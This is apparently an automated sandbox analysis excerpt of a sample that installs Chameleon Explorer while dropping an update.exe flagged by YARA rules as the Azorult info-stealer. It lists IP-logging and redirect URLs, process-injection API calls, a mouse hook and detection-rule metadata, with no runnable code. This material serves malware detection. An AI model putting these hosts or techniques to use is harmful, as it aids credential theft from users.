                    Source: cexplorer.exe, 00000001.00000003.1945646507.00000000020F6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.chameleon-managers.comsK
                    Source: cexplorer.exe, 00000001.00000003.1720546422.0000000002370000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1945646507.00000000020F6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1723437714.0000000003200000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1936284190.0000000002294000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.dk-soft.org/
                    Source: cexplorer.exe, 00000001.00000003.1721375497.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1721149790.00000000024B0000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000000.1721951365.0000000000401000.00000020.00000001.01000000.00000006.sdmp, cexplorer.tmp.1.drString found in binary or memory: http://www.innosetup.com/
                    Source: cexplorer.exe, 00000001.00000000.1719947136.0000000000401000.00000020.00000001.01000000.00000005.sdmp, cexplorer.exe.0.drString found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
                    Source: ETVk1yP43q.exe, 00000000.00000003.1756339774.0000000004937000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1796035751.0000000004937000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1756018602.0000000004917000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.myexternalip.com/raw
                    Source: cexplorer.exe, 00000001.00000003.1720546422.0000000002370000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1945646507.00000000020F6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1723437714.0000000003200000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1936284190.0000000002294000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.palkornel.hu/innosetup%1
                    Source: cexplorer.exe, 00000001.00000003.1721375497.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1721149790.00000000024B0000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000000.1721951365.0000000000401000.00000020.00000001.01000000.00000006.sdmp, cexplorer.tmp.1.drString found in binary or memory: http://www.remobjects.com/ps
                    Source: cexplorer.exe, 00000001.00000003.1721375497.000000007FE32000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1721149790.00000000025C6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.1942069076.000000000018E000.00000004.00000010.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005F79000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005E3A000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, ChameleonFolder.exe, 00000009.00000003.1860258055.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892493052.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, ChameleonFolder.exe, 0000000B.00000003.1895117695.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp, cexplorer.exe.0.dr, cexplorer.tmp.1.dr, is-JAVSO.tmp.2.drString found in binary or memory: http://www.startssl.com/0Q
                    Source: cexplorer.exe, 00000001.00000003.1721375497.000000007FE32000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1721149790.00000000025C6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.1942069076.000000000018E000.00000004.00000010.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005F79000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005E3A000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, ChameleonFolder.exe, 00000009.00000003.1860258055.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892493052.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, ChameleonFolder.exe, 0000000B.00000003.1895117695.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp, cexplorer.exe.0.dr, cexplorer.tmp.1.dr, is-JAVSO.tmp.2.drString found in binary or memory: http://www.startssl.com/policy0
                    Source: ETVk1yP43q.exe, 00000000.00000003.1777701833.0000000004BDE000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1796709623.0000000004BDE000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1778470634.0000000004BDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2no.co/
                    Source: ETVk1yP43q.exe, 00000000.00000003.1778521848.0000000004B88000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1782873840.0000000004B9B000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1777701833.0000000004B84000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1796862019.0000000004BFF000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1755851564.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1796686615.0000000004BA2000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1776975922.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1783603372.0000000004BA2000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1777057613.0000000004C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2no.co/1dHC37
Source: ETVk1yP43q.exe, 00000000.00000003.1782637071.0000000004AB9000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1755737499.0000000004AB2000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1783160385.0000000004AB9000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1796392614.0000000004AB9000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://2no.co/1dHC37B
Source: ETVk1yP43q.exe, 00000000.00000003.1755851564.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1776975922.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1777057613.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1797114581.0000000004C9A000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://2no.co/redirect-
Source: ETVk1yP43q.exe, 00000000.00000003.1777701833.0000000004B84000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1778548734.0000000004B85000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1796667122.0000000004B85000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://2no.co:443/1dHC37Users
Source: ETVk1yP43q.exe, 00000000.00000003.1782637071.0000000004AB9000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1755737499.0000000004AB2000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1783160385.0000000004AB9000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1796392614.0000000004AB9000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://api.ipify.org
Source: ETVk1yP43q.exe, 00000000.00000003.1755851564.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1776975922.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1777057613.0000000004C98000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://cdn.iplogger.org/favicon.ico
Source: ETVk1yP43q.exe, 00000000.00000003.1755851564.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1776975922.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1777057613.0000000004C98000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://cdn.iplogger.org/redirect/logo-dark.png);background-position:center;background-repeat:no-rep
Source: ETVk1yP43q.exe, 00000000.00000003.1776975922.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1778424639.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1797004863.0000000004C59000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://cdn.iplogger.org/redirect/logo-dark.png);background-position:center;z
Source: ETVk1yP43q.exe, 00000000.00000002.1796862019.0000000004BFF000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1776975922.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1755851564.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1776975922.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1778424639.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1797004863.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1777057613.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1797114581.0000000004C9A000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://counter.yadro.ru/hit?
Source: cexplorer.tmp, 00000002.00000002.1942069076.000000000018E000.00000004.00000010.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005F79000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005E3A000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, ChameleonFolder.exe, 00000009.00000003.1860258055.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000002.1912013674.0000000000148000.00000004.00000010.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892493052.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, ChameleonFolder.exe, 0000000B.00000003.1895117695.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp, is-JAVSO.tmp.2.dr; String found in binary or memory: https://d.symcb.com/cps0%
Source: cexplorer.tmp, 00000002.00000002.1942069076.000000000018E000.00000004.00000010.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005F79000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005E3A000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, ChameleonFolder.exe, 00000009.00000003.1860258055.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000002.1912013674.0000000000148000.00000004.00000010.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892493052.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, ChameleonFolder.exe, 0000000B.00000003.1895117695.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp, is-JAVSO.tmp.2.dr; String found in binary or memory: https://d.symcb.com/rpa0
Source: cexplorer.tmp, 00000002.00000002.1942069076.000000000018E000.00000004.00000010.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005F79000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005E3A000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, ChameleonFolder.exe, 00000009.00000003.1860258055.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892493052.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, ChameleonFolder.exe, 0000000B.00000003.1895117695.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp, is-JAVSO.tmp.2.dr; String found in binary or memory: https://d.symcb.com/rpa0.
Source: update.exe, update.exe, 00000015.00000002.2485021748.00000000029D6000.00000040.00001000.00020000.00000000.sdmp, update.exe, 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp; String found in binary or memory: https://dotbit.me/a/
Source: ETVk1yP43q.exe, 00000000.00000002.1796862019.0000000004BFF000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1776975922.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1755851564.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1776975922.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1778424639.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1797004863.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1777057613.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1797114581.0000000004C9A000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://iplogger.org/
Source: ETVk1yP43q.exe, 00000000.00000002.1796862019.0000000004BFF000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1776975922.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1755851564.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1776975922.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1778424639.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1797004863.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1777057613.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1797114581.0000000004C9A000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://iplogger.org/privacy/
Source: ETVk1yP43q.exe, 00000000.00000002.1796862019.0000000004BFF000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1776975922.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1755851564.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1776975922.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1778424639.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1797004863.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1777057613.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1797114581.0000000004C9A000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://iplogger.org/rules/
Source: ChameleonExplorer.exe, 00000004.00000002.1831169359.00000000014C7000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://neosoft-activator.appspot.com/
Source: ChameleonExplorer.exe, 00000004.00000002.1831169359.00000000014C7000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://neosoft-activator.appspot.com/activation/4/?h_id=75254DF3C66AB052045780D3C643713C-1B3D82FF20
Source: ChameleonExplorer.exe, 00000004.00000002.1831169359.00000000014C7000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://neosoft-activator.appspot.com/vB
Source: cexplorer.exe, 00000001.00000003.1721375497.000000007FE32000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1721149790.00000000025C6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.1942069076.000000000018E000.00000004.00000010.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005F79000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005E3A000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, ChameleonFolder.exe, 00000009.00000003.1860258055.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892493052.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, ChameleonFolder.exe, 0000000B.00000003.1895117695.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp, cexplorer.exe.0.dr, cexplorer.tmp.1.dr, is-JAVSO.tmp.2.dr; String found in binary or memory: https://www.startssl.com/policy0
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown; Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown; HTTPS traffic detected: 104.21.79.229:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 172.217.16.212:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe; Windows user hook set: 0 mouse C:\Program Files (x86)\Chameleon Explorer\Folder.dll
Source: cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp; Binary or memory string: RegisterRawInputDevices error!Umemstr_16402902-0

System Summary

Source: 21.2.update.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 21.2.update.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Azorult Payload Author: kevoreilly
Source: 21.2.update.exe.29d6000.1.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 21.2.update.exe.29d6000.1.unpack, type: UNPACKEDPE; Matched rule: Azorult Payload Author: kevoreilly
Source: 21.2.update.exe.29d6000.1.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 21.2.update.exe.29d6000.1.raw.unpack, type: UNPACKEDPE; Matched rule: Azorult Payload Author: kevoreilly
Source: 00000015.00000002.2485021748.00000000029D6000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 00000015.00000002.2485021748.00000000029D6000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Azorult Payload Author: kevoreilly
Source: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 00000003.00000002.2181002868.0000000003226000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: ETVk1yP43q.exe, 00000000.00000000.1666434300.0000000000495000.00000002.00000001.01000000.00000003.sdmp; String found in binary or memory: This is a third-party compiled AutoIt script.memstr_aa0ec4ec-f
Source: ETVk1yP43q.exe, 00000000.00000000.1666434300.0000000000495000.00000002.00000001.01000000.00000003.sdmp; String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_5177280e-e
Source: ETVk1yP43q.exe; String found in binary or memory: This is a third-party compiled AutoIt script.memstr_05d245f8-9
Source: ETVk1yP43q.exe; String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_43cc7580-e
Source: C:\Users\user\AppData\Roaming\update.exe; Code function: 3_2_007A141B NtSetContextThread,3_2_007A141B
Source: C:\Users\user\AppData\Roaming\update.exe; Code function: 3_2_007A1162 NtProtectVirtualMemory,3_2_007A1162
Source: C:\Users\user\AppData\Roaming\update.exe; Code function: 3_2_007A1448 NtResumeThread,Sleep,3_2_007A1448
Source: C:\Users\user\AppData\Roaming\update.exe; Code function: 21_2_00601162 NtProtectVirtualMemory,21_2_00601162
Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp; Code function: 2_2_03577F10 2_2_03577F10
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe; Code function: 11_2_03477F10 11_2_03477F10
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe; Code function: 15_2_0333ECDB 15_2_0333ECDB
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe; Code function: 15_2_03269680 15_2_03269680
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe; Code function: 15_2_0327E6D0 15_2_0327E6D0
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe; Code function: 15_2_0333C001 15_2_0333C001
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe; Code function: 16_2_02977F10 16_2_02977F10
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe; Code function: 17_2_029F7F10 17_2_029F7F10
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe; Code function: 18_2_029C7F10 18_2_029C7F10
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe; Code function: 19_2_02A97F10 19_2_02A97F10
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe; Code function: 20_2_0332FD10 20_2_0332FD10
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe; Code function: 20_2_03342360 20_2_03342360
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe; Code function: 22_2_02A37F10 22_2_02A37F10
Source: Joe Sandbox View; Dropped File: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe (copy) 9A9923C08D3FC5937B6ED189E20CF416482A079BC0C898C4ED75329E0EE3AE89
Source: Joe Sandbox View; Dropped File: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe (copy) 137723BDD388F6E5A50B7942EFF02F4CC70E6B86D8650A41F9E8956EA1E4DE3B
Source: Joe Sandbox View; Dropped File: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe (copy) 3F6880605A97FFB9B14CD97419A40CB2EA6CEFD616E417FE538031D633FB93B9
Source: C:\Users\user\AppData\Roaming\update.exe; Code function: String function: 00403BF4 appears 46 times
Source: C:\Users\user\AppData\Roaming\update.exe; Code function: String function: 00401358 appears 32 times
Source: C:\Users\user\AppData\Roaming\update.exe; Code function: String function: 004062FC appears 42 times
Source: C:\Users\user\AppData\Roaming\update.exe; Code function: String function: 00404E98 appears 86 times
Source: C:\Users\user\AppData\Roaming\update.exe; Code function: String function: 0040300C appears 32 times
Source: C:\Users\user\AppData\Roaming\update.exe; Code function: String function: 00404EC0 appears 33 times
Source: C:\Users\user\AppData\Roaming\update.exe; Code function: String function: 004034E4 appears 32 times
Source: cexplorer.tmp.1.dr; Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: cexplorer.tmp.1.dr; Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-OJNBS.tmp.2.dr; Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-OJNBS.tmp.2.dr; Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-KSQ9G.tmp.2.dr; Static PE information: Number of sections : 11 > 10
Source: is-29AV0.tmp.2.dr; Static PE information: Number of sections : 11 > 10
Source: is-SCGGO.tmp.2.dr; Static PE information: Number of sections : 11 > 10
Source: ETVk1yP43q.exe, 00000000.00000003.1782637071.0000000004AB9000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: FV_ORIGINALFILENAME6XiQN vs ETVk1yP43q.exe
Source: ETVk1yP43q.exe, 00000000.00000003.1772720667.0000000001983000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: OriginalFilename vs ETVk1yP43q.exe
Source: ETVk1yP43q.exe, 00000000.00000003.1772720667.0000000001983000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: FV_ORIGINALFILENAME vs ETVk1yP43q.exe
Source: ETVk1yP43q.exe, 00000000.00000003.1769018382.0000000003D14000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: ents|CompanyName|FileDescription|FileVersion|InternalName|LegalCopyright|LegalTrademarks|OriginalFilename|ProductName|ProductVersion|PrivateBuild|SpecialBuild++O$ vs ETVk1yP43q.exe
Source: ETVk1yP43q.exe, 00000000.00000003.1769018382.0000000003D14000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: ents|CompanyName|FileDescription|FileVersion|InternalName|LegalCopyright|LegalTrademarks|OriginalFilename|ProductName|ProductVersion|PrivateBuild|SpecialBuild vs ETVk1yP43q.exe
Source: ETVk1yP43q.exe, 00000000.00000003.1755737499.0000000004AB2000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: FV_ORIGINALFILENAME6XiQN vs ETVk1yP43q.exe
Source: ETVk1yP43q.exe, 00000000.00000003.1783160385.0000000004AB9000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: FV_ORIGINALFILENAME6XiQN vs ETVk1yP43q.exe
Source: ETVk1yP43q.exe, 00000000.00000002.1796392614.0000000004AB9000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: FV_ORIGINALFILENAME6XiQN vs ETVk1yP43q.exe
Source: ETVk1yP43q.exe, 00000000.00000003.1777619102.000000000198A000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: OriginalFilename vs ETVk1yP43q.exe
Source: ETVk1yP43q.exe, 00000000.00000003.1777619102.000000000198A000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: FV_ORIGINALFILENAME vs ETVk1yP43q.exe
Source: ETVk1yP43q.exe; Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 21.2.update.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 21.2.update.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 21.2.update.exe.29d6000.1.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 21.2.update.exe.29d6000.1.unpack, type: UNPACKEDPE; Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
